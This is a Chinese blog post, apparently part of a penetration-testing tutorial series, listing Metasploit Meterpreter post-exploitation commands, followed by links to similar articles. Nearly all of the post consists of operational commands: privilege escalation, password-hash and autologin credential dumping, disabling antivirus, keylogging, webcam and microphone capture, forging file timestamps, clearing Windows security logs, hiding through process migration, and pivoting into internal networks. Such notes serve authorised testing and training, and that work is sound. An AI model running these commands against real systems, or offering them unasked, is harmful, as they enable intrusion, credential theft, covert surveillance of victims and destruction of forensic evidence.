12、后渗透测试--meterpreter使用

最新推荐文章于 2024-01-26 15:41:32 发布
最新推荐文章于 2024-01-26 15:41:32 发布
阅读量1.1k 收藏 20
点赞数
分类专栏: 安全 文章标签: metasploit meterpreter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/128303115
版权
Post后渗透模块
在meterpreter > 中我们可以使用以下的命令来实现对目标的操作。
 

一、基本系统命令

sessions    # sessions –h 查看帮助
sessions -i <ID值>  # 进入会话   -k  杀死会话
background  # 将当前会话放置后台
info   # 查看已有模块信息
getuid   查看获取的当前权限
getsystem           提权
getpid    # 获取当前进程的pid
sysinfo   # 查看目标机系统信息
ps          # 查看当前活跃进程    kill <PID值> 杀死进程
idletime            查看目标机运行时间
 
hashdump     # 从SAM数据库导出密码的哈希
 
reboot / shutdown   # 重启/关机
shell     # 进入目标机cmd shell
load kiwi           加载wiki模块
run                   使用扩展库,执行已有的模块,输入run后按两下tab,列出已有的脚本
run  killav         关闭杀毒软件
 
run scraper         查看目标主机详细信息

 二、execute执行文件

execute  参数  -f 可执行文件   执行可执行程序
execute -H -i -f cmd.exe    # 创建新进程cmd.exe,-H不可见,-i交互
 

三、目录/文件操作

pwd / getwd   目标机器上当前目录(windows)
cd     # 目标机器上切换目录
ls      目标机器上显示
dir    目标机器上查看
mkdir dir1 dir2
mv oldfile newfile
rmdir dir1
  
getlwd / lpwd  查看攻击机当前目录(Linux)
lls       # 在攻击机显示
lcd      # 在攻击机上切换目录
 
cat C:\\Users\\zq\\Desktop\\123.txt    # 目标机器上读取内容
edit C:\\Users\\zq\\Desktop\\123.txt   # 篡改目标机器上的文件
search -f *.jsp -d e:\              搜索E盘中所有以.jsp为后缀的文件
upload msfdb /root/Desktop/Kage.0.1.1-beta_linux.AppImage C:\\Users\\zq\\Desktop    将两个文件传到目标机的桌面
download  C:\\Users\\zq\\Desktop\\123.txt  /root       将目标机的e:\test.txt文件下载到/root目录

四、timestomp伪造时间戳

timestomp C:// -h    # 查看帮助
timestomp -v C://2.txt   # 查看时间戳
timestomp C://2.txt -f C://1.txt    # 将1.txt的时间戳复制给2.txt

五、进程

ps     查看目标主机活跃进程信息
getpid         # 查看当前Meterpreter Shell的进程
migrate 1732    将当前Meterpreter Shell的进程迁移到PID1732的进程上,这样不容器被发现
kill <pid值>   # 杀死进程

六、网络

arp   # 显示目标机器arp缓存
getproxy  # 显示目标机器的代理
ifconfig
netstat -ano
route
portfwd   # 端口重定向
portfwd add -l 3389 -p 3389 -r 172.16.0.100    # 将目标机的3389端口转发到本地3389端口
然后使用rdesktop ip远程登录:

七、autoroute添加路由

run autoroute –h    # 查看帮助
run autoroute -s 192.168.159.0/24  # 添加到目标环境网络
run autoroute –p  # 查看添加的路由
然后可以利用arp_scanner、portscan等进行扫描
run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

八、uictl开关键盘/鼠标

uictl [enable/disable] [keyboard/mouse/all]  # 开启或禁止键盘/鼠标
uictl disable mouse  # 禁用鼠标
uictl disable keyboard  # 禁用键盘

九、用户接口命令(键盘嗅探,鼠标、屏幕、音频、摄像头

keyscan_start                开启键盘记录功能
在靶机上用键盘输入内容
keyscan_dump                 显示捕捉到的键盘记录信息
keyscan_stop                 停止键盘记录功能
 
鼠标:
  
screenshare  # 屏幕共享
保存在/usr/share/metasploit-framework/uDRIzzpV.html,可以直接浏览器打开。
 
screenshot   截图
 
record_mic   # 音频
play  # 播放音频
 
 
webcam_list         查看目标主机的摄像头
webcam_snap      # 目标主机摄像头拍照
webcam_stream       # 目标主机通过摄像头开视频
webcam_chat -h  开始与目标进行视频对话。

十、clearav清除日志

clearev     清除windows中的应用程序日志、系统日志、安全日志

十一、信息搜集脚本

run post/windows/manage/migrate                  #自动进程迁移    
run post/windows/gather/checkvm                  #查看目标主机是否运行在虚拟机上   
run post/linux/gather/checkvm    # 是否虚拟机
 
run post/windows/manage/killav                   #关闭杀毒软件    
run post/windows/manage/enable_rdp               #开启远程桌面服务    
run post/windows/manage/autoroute                #查看路由信息    
run post/windows/gather/dumplinks               #获取最近的文件操作
run post/windows/gather/enum_logged_on_users     #列举当前登录的用户    
run post/windows/gather/enum_applications        #列举应用程序    
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码    
run windows/gather/smart_hashdump                #dump出所有用户的hash
青霄
关注
  • 0
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【THM】MetasploitMeterpreter-初级渗透测试
追风少年亚索的博客
04-10 855
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
metepreter命令
sunshine19871211的博客
04-14 997
https://xz.aliyun.com/t/2536 meterpreter后渗透命令 background 将会话切换到后台 sessions -l sessions -i 2 启动一个shell或一个meterpreter sessions -k 2 杀死shell upload /root/桌面/payload.txt c: edit payload.txt cat ls c: ...
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 717
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
Metasploit】MSF常用命令
m0_62783065的博客
02-06 1816
Metasploit】MSF常用命令
meterpreter使用详解
lweiheng blog
01-07 3483
meterpreter使用详解 文章目录meterpreter使用详解0 meterpreter简介1 meterpreter控制技巧总结1.1 命令详解1.2 sessions 控制命令1.3 meterpreter收集信息1.3.1 meterpreter 收集windows主机信息1.3.1.1 收集系统信息1.3.1.2 收集本地(域)用户信息1.3.1.3 收集当前用户信息1.3.1.4...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3833
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   MeterpreterMetasploit 框架中的一...
79-79.渗透测试-meterpreter介绍.mp4
最新发布
05-10
79-79.渗透测试-meterpreter介绍.mp4
E026-渗透测试常用工具-使用meterpreter模块进行后渗透测试.pdf
12-02
本课程主要讲解如何使用Meterpreter模块进行后渗透测试。 首先,了解MeterpreterMeterpreter是一种动态的、交互式的远程控制工具,它是Metasploit框架的一部分。它可以在多种操作系统上运行,包括Windows、Linux...
内网渗透测试-提权工具
05-25
在内网渗透测试中,提权工具的使用通常遵循以下步骤: 1. **信息收集**:首先,使用Nmap、Wireshark等工具扫描目标网络,获取主机信息、开放端口和服务。 2. **漏洞利用**:根据信息收集的结果,选择合适的漏洞...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
meterpreter使用攻略
sulongniao3的博客
10-20 1000
后渗透之meterpreter使用攻略 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入r
Meterpreter后渗透模块之信息收集
sGanYu
09-23 2134
进程迁移 防止进程被用户关闭,移动shell 1)手动 先使用ps查看目标正在运行的进程 查看当前进程号 meterpreter > getpid Current pid: 1104 从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号 meterpreter > mig
meterpreter使用教程
u011250160的博客
04-26 1642
Core Commands ============= Command Description ------- ----------- ? 在meterpreter下输入?和help是一样的就是显示所有的参数 background background和bg是一样的,后台运行shell,也相当于ctrl+z进入后台运行
后渗透Meterpreter常用命令记录
Sp4rkW的博客
12-18 8988
基本命令 命令 解释 background 将meterpreter终端隐藏在后台(快捷键ctrl+z) sessions 查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. quit 直接关闭当前的meterpreter会话,返回MSF终端. shell 获取目标系统的控制台shell. irb 在meterpret
Metasploit基础和命令使用
w1304099880的博客
03-19 1311
Metasploit基础Metasploit是什么?渗透测试是干什么的?Metasploit基础命令 Metasploit是什么? Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个
Meterpreter使用总结(2)之后渗透攻击模块
热门推荐
CODING...
02-08 1万+
meterpreter虽然功能强大,作为单一的工具还是会有他功能的局限性,因此在metasploit4.0之后引入了后渗透攻击模块,通过在meterpreter使用ruby编写的模块来进行进一步的渗透攻击。 (1)获取目标机器的分区情况: (2)判断是否为虚拟机: 如果有时候我们渗透测试的时候发现获得的目标机器是一个虚拟机,就要打醒十二分精神了,有可能这个是对方设置的一个蜜罐系统。
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
INTRODUÇÃO A PÓS EXPLORAÇÃO.pdf
10-06
要成功进行后渗透测试,测试者需要具备丰富的操作系统知识,特别是Windows和Linux系统,因为这两个系统在企业环境中广泛使用。了解操作系统的工作原理、权限管理、日志记录以及如何隐藏活动是必不可少的。此外,熟悉...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值